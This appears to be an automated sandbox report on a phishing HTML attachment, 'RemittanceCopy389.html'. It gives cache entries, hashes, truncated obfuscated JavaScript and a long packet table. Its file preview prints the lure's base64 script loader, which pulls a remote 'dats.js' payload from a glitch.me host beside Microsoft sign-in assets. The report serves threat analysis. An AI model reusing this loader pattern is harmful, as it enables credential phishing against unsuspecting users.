Preview:	function _0x198b(_0x4bd971,_0x7fba6c){var _0x510e69=_0x15c7();return _0x198b=function(_0x21dda5,_0x1f0fb0){_0x21dda5=_0x21dda5-(-0x285+-0x2479+0x27f5);var _0x15c40c=_0x510e69[_0x21dda5];if(_0x198b['ksqqRp']===undefined){var _0xade43d=function(_0xaeff8d){var _0xcee5a='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x58ed1a='',_0x6186e6='',_0x2c5565=_0x58ed1a+_0xade43d;for(var _0x593298=-0xaba+-0x1fed+0x2aa7,_0x229419,_0x560bd9,_0x2d5151=-0x1224+0x2318+-0x10f4;_0x560bd9=_0xaeff8d['charAt'](_0x2d5151++);~_0x560bd9&&(_0x229419=_0x593298%(-0x2-0xa2b+-0xc2d+0x2b7-0x3)?_0x229419(-0x2303+-0x1e36+0x4179)+_0x560bd9:_0x560bd9,_0x593298++%(-0x1-0x23+-0x58f-0x2+-0xb3d))?_0x58ed1a+=_0x2c5565['charCodeAt'](_0x2d5151+(0x12f7+0xd9f+0x1-0x208c))-(0x1-0x1619+0x2b0x1f+0x10ee)!==0x23f1+-0x1ba1+-0x260x38?String['fromCharCode'](0x22-0x44+0xee4+-0x30x19f&_0x229419>>(-(-0x2e90x1+0x173d+0x1-0x1452)_0x593298&-0xced+-0x1f80+0x2c73)):_0x593298:0x1abe+-0x1d21+0x263){_0x560bd9=

Chrome Cache Entry: 140

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
Category:	dropped
Size (bytes):	199
Entropy (8bit):	6.766983163126765
Encrypted:	false
SSDEEP:	6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
MD5:	21B761F2B1FD37F587D7222023B09276
SHA1:	F7A416C8907424F9A9644753E3A93D4D63AE640E
SHA-256:	72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
SHA-512:	77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....

Chrome Cache Entry: 141

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
Category:	dropped
Size (bytes):	1173
Entropy (8bit):	7.811199816788843
Encrypted:	false
SSDEEP:	24:XuByTjb3w436CJvnuI5wTGPjl2kGKvu3pufqOdyq3/VYHjyK5AXn:X8yz1qCkUYo1ozgt9YHGKe
MD5:	5C7ACF60A2ACAA5C54BF2B2EC6D484D8
SHA1:	F1837FD5DB6DAD498148D7D77438DE693114B042
SHA-256:	EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
SHA-512:	11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..........uV.n$7......iR.+..LN9.oA..5.......nx..S...l..%[..)..=.....z.?/.._......\|{8.4M........^.~w>=>......t.....~.M;.....,....n~}=-.7........U.<>=.._.O.....y9.>.....y...wR.`8..r..q$.....KR...X.....W.....$g'". W<..$..-.2.....h04.O...\|._../.6.)..ax..X...wzT.....2..7....1....C.@8B....d.M..KS8..>... .%=...q....yWF....\..kM.H....<..&.mM..s...%.'G.n..(..h.-.I.S.K...1;..:7.xdvP..y.]....Q$..4.@.2Fp ..Oe.......=.I........F......{....`.............uC..G.....'..E.....dR..g.(.+K.q...?...O.%.@.i..."n...1 .JTm.S..wM.,../.\|H..s.....C.=.B1(.B.f..:K.\.T....c..N...sT..D....T.=..Zt..M2.).FP.h.:.+A.. ^N-$..U.K..n.u.DZ...d.C....s.n.PI..@.4.pi....G..j.5.7l6....Q$...fs....uD......F...e%..}5.S.s.n".9...e&(_.=..oq..F%L...G].....b.`..hi.S.I.8..Y%hM.\|..W....jC.-a..'..%.r..W?...a...H...5.c......v.G..v.G.a....a/.LT.Fv......7.A...@.OcV.......6xcy,l[.wkP..-E...U..J.....1j....2....C+...?.I.Q.C.kM.n...j..5{HV)I...M.G2o......5.....E_..j.....D...^b..+.U..,K2

Chrome Cache Entry: 142

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 143

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
Category:	downloaded
Size (bytes):	199
Entropy (8bit):	6.766983163126765
Encrypted:	false
SSDEEP:	6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
MD5:	21B761F2B1FD37F587D7222023B09276
SHA1:	F7A416C8907424F9A9644753E3A93D4D63AE640E
SHA-256:	72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
SHA-512:	77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg
Preview:	..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....

Chrome Cache Entry: 144

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 145

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	1051640
Entropy (8bit):	5.029286349480704
Encrypted:	false
SSDEEP:	24576:S+YUCEof2xez8FqEGfqjh9GnjlpxyHeAtFaJDfvSZ/O3I9ykq+GBnMt8CsAldQ:nCdf2xez8Ff0qN9GjlpxyHeAtFaJDfvX
MD5:	73DB972C193B8AFCB4D3F9AE9AA1433A
SHA1:	264AB0E83AF1CA4C292CDA14E56D9E4BDCBFF022
SHA-256:	86E3E2E859DEAA2EDE719E193815EEAEA716D73C439BD1A3FC4E81FE729B4D2F
SHA-512:	18CAD7E5FB6555CE126288B37CA9BA124127DD566D82EE213993DF59F54E45610E8339AED09539E82BD9E5568411D21F24451AB7C4AEF5EA2418B549927426D8
Malicious:	false
URL:	https://rounded-screeching-script.glitch.me/dats.js
Preview:	(function(_0x51c855,_0x13552a){function _0x18d5d2(_0x53f692,_0x315049,_0x5081b6,_0x5c6487){return _0xe1d9(_0x53f692- -0x240,_0x5081b6);}var _0x678d1d=_0x51c855();function _0x642f2e(_0x308adc,_0x335e06,_0x20d00f,_0x2ee006){return _0xe1d9(_0x335e06-0x2df,_0x2ee006);}while(!![]){try{var _0x24aa7f=-parseInt(_0x18d5d2(0xfdb,0x1ab2,0x96f,0xd01))/(0x768+0x167-0x11+0x1070)+parseInt(_0x642f2e(0x16d7,0x54e,0xa55,0x87e))/(0xce8+0x1d20+-0x20x1503)+-parseInt(_0x642f2e(0x9ac,0x141f,0x3e1,0x274c))/(0x3-0xaac+0x10x233e+-0x337)+parseInt(_0x642f2e(0x1131,0x1d7a,0x27b2,0x2628))/(-0x125-0x4+-0x25ea+0x20x10ad)+-parseInt(_0x18d5d2(0x499,0x2b0,-0x13d,0x3df))/(0xe-0x9b+0x17df+-0x2900x6)(-parseInt(_0x642f2e(0x16e2,0x1ec4,0x1d4f,0x2f3d))/(0x1-0x92f+0x20c5+0xd-0x1d0))+-parseInt(_0x642f2e(0x2ce3,0x29a5,0x3977,0x1ff0))/(-0x218+0x5c-0x19+0x10xb1b)+parseInt(_0x18d5d2(0x23db,0x13ef,0x1eaa,0x3161))/(0x118c+0x16e5+0x5-0x815)(parseInt(_0x642f2e(0x613,0x13af,0xa1b,0x1ca2))/(0x156f+0xc50x2+-0x16f0));if(_0x

Static File Info

General

File type:	HTML document, ASCII text, with CRLF line terminators
Entropy (8bit):	5.839310609047151
TrID:	HyperText Markup Language (15015/1) 55.58% HyperText Markup Language (12001/1) 44.42%
File name:	RemittanceCopy389.html
File size:	616 bytes
MD5:	b674f6e96d065f0c1814e58a53ba2ce4
SHA1:	b15dca0f94736c9c1a905235647423442feab63f
SHA256:	3eecc080c42c38c3776d442d58c8975a2e36956acafec76d407a6fde7b759d76
SHA512:	ba3479db3855fbcaf7cbcf92aae33bd63fa008e12d7a16004ded9b5c9bafc4d74392b6fbb038fd9eebd70aa68e973d5dea179f70ab208f656ea7edc1841a6f22
SSDEEP:	12:haxoYlp1apo5uFE/cMzrpRnDRKOJqipRjXmis9MWYlp1apo5uFEKb+VMA33:hamYlp0powFE/cMzNRDR1gSR7ns9MWY5
TLSH:	D2F0DDD53C208C152A88D7E87AE3C1FCA94D60942D0B442CD98095C31632B99AC03BC0
File Content Preview:	<!DOCTYPE html><html><head> <script src="data:/html;base64,ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vcm91bmRlZC1zY3JlZWNoaW5nLXNjcmlwdC5nbGl0Y2gubWUvZGF0cy5qcyI+PC9zY3JpcHQ+Jyk7"></script>..<script>..var..inputElem

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 21:19:49.490377903 CEST	49675	443	192.168.2.4	173.222.162.32
Jul 3, 2024 21:19:59.099704981 CEST	49675	443	192.168.2.4	173.222.162.32
Jul 3, 2024 21:20:00.181160927 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:00.181206942 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:00.181346893 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:00.181705952 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:00.181716919 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:00.880309105 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:00.883620977 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:00.883640051 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:00.884879112 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:00.885018110 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:00.886522055 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:00.886589050 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:00.886928082 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:00.886934996 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:00.927975893 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.091531038 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.091573954 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.091581106 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.091605902 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.091631889 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.091640949 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.091660023 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.091675043 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.091696024 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.091728926 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.169740915 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.169838905 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.169852018 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.171561003 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.171585083 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.171624899 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.171633959 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.171672106 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.181314945 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.181372881 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.181381941 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.181400061 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.181449890 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.263202906 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.263276100 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.263288975 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.264436960 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.264455080 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.264508009 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.264517069 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.264542103 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.265822887 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.265837908 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.265921116 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.265921116 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.265928030 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.267627001 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.267642975 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.267935991 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.267945051 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.318589926 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.353347063 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.353365898 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.353425980 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.353442907 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.353521109 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.354137897 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.354152918 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.354219913 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.354227066 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.354269028 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.354707956 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.354723930 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.354779005 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.354785919 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.355221033 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.355457067 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.355474949 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.355515003 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.355520964 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.355539083 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.355581999 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.356345892 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.356385946 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.356410980 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.356415987 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.356462002 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.356462002 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.357304096 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.357320070 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.357377052 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.357383013 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.357405901 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.357503891 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.358223915 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.358237982 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.358282089 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.358288050 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.358330011 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.358918905 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.361588001 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.361605883 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.361663103 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.361669064 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.361680031 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.361752033 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.443192005 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.443209887 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.443299055 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.443309069 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.443700075 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.443851948 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.443867922 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.443908930 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.443916082 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.443977118 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.443977118 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.444540977 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.444555998 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.444613934 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.444619894 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.444629908 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.444699049 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.445175886 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.445197105 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.445246935 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.445251942 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.445296049 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.445296049 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.448179007 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.448194981 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.448268890 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.448278904 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.448770046 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.448791981 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.448858023 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.448858023 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.448865891 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.448916912 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.449417114 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.449431896 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.449506998 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.449506998 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.449512959 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.449532032 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.449558973 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.451311111 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.451333046 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.451411963 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.451419115 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.451458931 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.451458931 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.534120083 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.534187078 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.534259081 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.534269094 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.534281015 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.534312010 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.534363985 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.534406900 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.534467936 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.534467936 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.534473896 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.534521103 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.535015106 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.535058022 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.535119057 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.535125971 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.535135031 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.535270929 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.535408020 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.535454988 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.535506010 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.535511017 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.535542965 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.535542965 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.536395073 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.536437035 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.536457062 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.536463022 CEST	443	49733	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:01.536489010 CEST	49733	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:01.536531925 CEST	49733	443	192.168.2.4	44.197.227.46
